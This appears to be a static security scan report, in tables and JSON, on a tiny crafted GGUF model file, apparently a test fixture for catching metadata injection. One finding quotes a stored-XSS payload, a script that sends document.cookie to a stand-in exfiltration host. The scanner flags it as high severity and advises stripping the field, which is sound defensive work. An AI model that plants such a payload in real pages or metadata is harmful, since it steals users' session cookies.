| Base score | 100 |
| HIGH Web-injection payload embedded in general.description | -15 |
| MEDIUM External URLs embedded in 1 KV metadata field(s) | -8 |
| MEDIUM Unusually high bits-per-parameter: 448.0 | -8 |
| Penalty subtotal | 69/100 |
| Final | C / 69 |
| Runtime | Status | Quant | Architecture | Context |
|---|---|---|---|---|
| llama.cpp | ✓ | ✓ | ✓ | — |
| Ollama | ✓ | ✓ | ✓ | — |
| LM Studio | ✓ | ✓ | ✓ | — |
| vLLM | ✗ | N/A | GGUF not supported — requires safetensors format | |
| HuggingFace Transformers | ✗ | N/A | GGUF not directly supported — use safetensors or PyTorch checkpoint | |
| Architecture Neural network family — determines which runtime can load this model | llama |
| Name | friendly-assistant-7b |
| Quantization Weight storage format derived from actual tensor dtypes; lower bits = smaller file and faster inference at the cost of accuracy |
F32 |
| Parameters ~ Estimated total number of weight values; determines VRAM needed at inference | 8 |
| Vocab size Number of unique tokens the tokenizer knows; affects embedding table size | 8 |
| Chat template Jinja2 prompt template embedded in model; controls how messages are formatted for inference | ✗ No |
| Tensors Total number of weight tensors stored in the file | 1 |
| License Usage license declared in model metadata; check terms before commercial deployment | apache-2.0 |
| SHA-256 | 2b538946930a1a994e68ded343e93cf5754cbe09c521e70070d36c72dd142de7 |
| SHA-512 | e3b890af1cde0b15832b5bf0378ce328b35928481745426a6b43fa7e219ce97b2fdacff8f75849fd… |
| File size (bytes) | 448 |
| Header + KV + tensor directory | 416 bytes (0.00 MB) |
| Tensor data region | 32 bytes (0.00 MB) |
| Trailing bytes | 0 |
| Unaccounted bytes | 0 ✓ |
| KV metadata keys | 5 |
| Tensors parsed | 1 |
| Offsets monotone | ✓ OK |
| DType | Count | Total bytes | Total MB | Avg bits/elem |
|---|---|---|---|---|
| F32 | 1 | 32 | 0.0 | 32.0 |
| # | Name | Dims | DType | Offset | Bytes | bits/elem |
|---|---|---|---|---|---|---|
| 0 | token_embd.weight | [8] | F32 | 0 | 32 | 32.0 |
{
"compatibility": [
{
"arch": true,
"container": true,
"context": null,
"notes": "GGUF v3 container: supported | quant F32: supported",
"quant": true,
"runtime": "llama.cpp",
"supported": true
},
{
"arch": true,
"container": true,
"context": null,
"notes": "GGUF via llama.cpp backend: container and quantization supported",
"quant": true,
"runtime": "Ollama",
"supported": true
},
{
"arch": true,
"container": true,
"context": null,
"notes": "GGUF container and quantization supported; GPU/CPU inference",
"quant": true,
"runtime": "LM Studio",
"supported": true
},
{
"arch": null,
"container": false,
"context": null,
"not_supported_msg": "GGUF not supported \u2014 requires safetensors format",
"notes": "GGUF not supported; requires safetensors format",
"quant": false,
"runtime": "vLLM",
"supported": false
},
{
"arch": null,
"container": false,
"context": null,
"not_supported_msg": "GGUF not directly supported \u2014 use safetensors or PyTorch checkpoint",
"notes": "GGUF not supported; requires safetensors or PyTorch checkpoint",
"quant": false,
"runtime": "HuggingFace Transformers",
"supported": false
}
],
"format": "LLM-SCAN",
"format_version": "1.0",
"generator": {
"name": "llmscan-engine",
"version": "2.0.0"
},
"model": {
"alignment": 32,
"arch": "llama",
"architecture": "llama",
"basename": null,
"block_count": null,
"bos_token_id": null,
"chat_template": null,
"context_length": null,
"dtype_histogram": {
"F32": 1
},
"dtype_percentage": {
"F32": 100.0
},
"dtype_stats": {
"F32": {
"avg_bits_per_elem": 32.0,
"bytes": 32,
"count": 1,
"mb": 0.0
}
},
"embedding_length": null,
"eos_token_id": null,
"feed_forward_length": null,
"file_size_bytes": 448,
"file_size_mb": 0.0,
"finetune": null,
"format": "gguf",
"gguf_version": 3,
"has_chat_template": false,
"head_count": null,
"head_count_kv": null,
"header_kv_dir_bytes": 416,
"kv_count": 5,
"kv_meta": {
"keys": [
"general.architecture",
"general.author",
"general.description",
"general.license",
"general.name"
],
"kv_count": 5,
"values_redacted": true
},
"license": "apache-2.0",
"max_tensor_offset": 0,
"misaligned_tensors": 0,
"model_name": "friendly-assistant-7b",
"offsets_monotone": true,
"oob_tensor_count": 0,
"overlapping_tensor_pairs": 0,
"param_estimate": 8,
"params_estimate": 8,
"quantization": "F32",
"scanner_model_info": {
"alignment": 32,
"architecture": "llama",
"basename": null,
"block_count": null,
"bos_token_id": null,
"chat_template": null,
"context_length": null,
"data_section_start": 416,
"dtype_histogram": {
"F32": 1
},
"dtype_percentage": {
"F32": 100.0
},
"dtype_stats": {
"F32": {
"avg_bits_per_elem": 32.0,
"bytes": 32,
"count": 1,
"mb": 0.0
}
},
"embedding_length": null,
"eos_token_id": null,
"feed_forward_length": null,
"file_size_bytes": 448,
"file_size_mb": 0.0,
"finetune": null,
"has_chat_template": false,
"head_count": null,
"head_count_kv": null,
"header_end_offset": 416,
"header_kv_dir_bytes": 416,
"kv_count": 5,
"kv_keys": [
"general.architecture",
"general.author",
"general.description",
"general.license",
"general.name"
],
"license": "apache-2.0",
"magic": "GGUF",
"max_tensor_offset": 0,
"misaligned_tensors": 0,
"model_name": "friendly-assistant-7b",
"offsets_monotone": true,
"oob_tensor_count": 0,
"overlapping_tensor_pairs": 0,
"param_estimate": 8,
"quantization": "F32",
"sha256": "2b538946930a1a994e68ded343e93cf5754cbe09c521e70070d36c72dd142de7",
"sha512": "e3b890af1cde0b15832b5bf0378ce328b35928481745426a6b43fa7e219ce97b2fdacff8f75849fd44e9f259dcf034a3f5129aa1948ac1a937811fc768f87ebe",
"size_label": null,
"tensor_bytes_sum": 32,
"tensor_count": 1,
"tensor_delta_bytes": 416,
"tensor_delta_mb": 0.0,
"tensor_preview": [
{
"bits_per_elem": 32.0,
"byte_len": 32,
"dims": [
8
],
"dtype_id": 0,
"dtype_name": "F32",
"index": 0,
"name": "token_embd.weight",
"offset": 0
}
],
"tokenizer_model": null,
"top_tensors_by_size": [
{
"byte_len": 32,
"dims": [
8
],
"dtype": "F32",
"n_elem": 8,
"name": "token_embd.weight"
}
],
"trailing_bytes": 0,
"unaccounted_bytes": 0,
"version": 3,
"vocab_size": 8
},
"sha256": "2b538946930a1a994e68ded343e93cf5754cbe09c521e70070d36c72dd142de7",
"sha512": "e3b890af1cde0b15832b5bf0378ce328b35928481745426a6b43fa7e219ce97b2fdacff8f75849fd44e9f259dcf034a3f5129aa1948ac1a937811fc768f87ebe",
"size_label": null,
"tensor_bytes_sum": 32,
"tensor_count": 1,
"tensor_delta_bytes": 416,
"tensor_delta_mb": 0.0,
"tensor_preview": [
{
"bits_per_elem": 32.0,
"byte_len": 32,
"dims": [
8
],
"dtype_id": 0,
"dtype_name": "F32",
"index": 0,
"name": "token_embd.weight",
"offset": 0
}
],
"tokenizer_model": null,
"top_tensors_by_size": [
{
"byte_len": 32,
"dims": [
8
],
"dtype": "F32",
"n_elem": 8,
"name": "token_embd.weight"
}
],
"trailing_bytes": 0,
"unaccounted_bytes": 0,
"values_redacted": true,
"vocab_size": 8
},
"report": {
"bullets": [
"GGUF v3 model | architecture: llama | quantization: F32 | 1 tensors | 1 blocking issue / 2 warnings",
"SHA256: 2b538946930a1a99..."
],
"recommendations": [
"Strip or reject this field; downstream tools that render GGUF metadata in a browser or web UI without escaping it are exposed to stored XSS",
"URLs in model metadata may be used for tracking or exfiltration when metadata is rendered; do not auto-fetch",
"Investigate what occupies the non-tensor file space"
],
"summary": "GGUF v3 model | architecture: llama | quantization: F32 | 1 tensors | 1 blocking issue / 2 warnings"
},
"scan_context": {
"duration_ms": 2,
"ended_at": "2026-08-14T22:29:35+00:00Z",
"limits": {
"sandbox": true,
"timeout_ms": 60000
},
"mode": "static-deep",
"started_at": "2026-08-14T22:29:35+00:00Z"
},
"security": {
"findings": [
{
"category": "Metadata",
"detail": "Value contains an HTML/JS injection pattern: \"A friendly, helpful 7B chat assistant.\u003cscript\u003efetch(\u0027https://exfil.example/c?d=\u0027+document.cookie)\u003c/script\u003e\"",
"recommendation": "Strip or reject this field; downstream tools that render GGUF metadata in a browser or web UI without escaping it are exposed to stored XSS",
"severity": "HIGH",
"title": "Web-injection payload embedded in general.description"
},
{
"category": "Metadata Security",
"detail": "Fields: [\u0027general.description\u0027]",
"recommendation": "URLs in model metadata may be used for tracking or exfiltration when metadata is rendered; do not auto-fetch",
"severity": "MEDIUM",
"title": "External URLs embedded in 1 KV metadata field(s)"
},
{
"category": "Resource Limits",
"detail": "Values \u003e128 bpp suggest most file content is not tensor data (padding, embedded files, or metadata bloat)",
"recommendation": "Investigate what occupies the non-tensor file space",
"severity": "MEDIUM",
"title": "Unusually high bits-per-parameter: 448.0"
}
],
"grade": "C",
"score": 69
},
"source": {
"filename": "xss-metadata.gguf",
"hashes": {
"sha256": "2b538946930a1a994e68ded343e93cf5754cbe09c521e70070d36c72dd142de7"
},
"input_type": "file",
"size_bytes": 448
},
"tensors": {
"count": 1,
"dtype_histogram": {
"F32": 1
},
"dtype_stats": {
"F32": {
"avg_bits_per_elem": 32.0,
"bytes": 32,
"count": 1,
"mb": 0.0
}
},
"integrity": {
"header_kv_dir_bytes": 416,
"misaligned_tensors": 0,
"offsets_monotone": true,
"oob_tensor_count": 0,
"overlapping_tensor_pairs": 0,
"tensor_bytes_sum": 32,
"tensor_delta_bytes": 416,
"tensor_delta_mb": 0.0,
"trailing_bytes": 0,
"unaccounted_bytes": 0
},
"preview": [
{
"bits_per_elem": 32.0,
"byte_len": 32,
"dims": [
8
],
"dtype_id": 0,
"dtype_name": "F32",
"index": 0,
"name": "token_embd.weight",
"offset": 0
}
]
},
"tokenizer": {
"bos_token_id": null,
"chat_template_chars": null,
"eos_token_id": null,
"has_chat_template": false,
"type": null,
"vocab_size": 8
}
}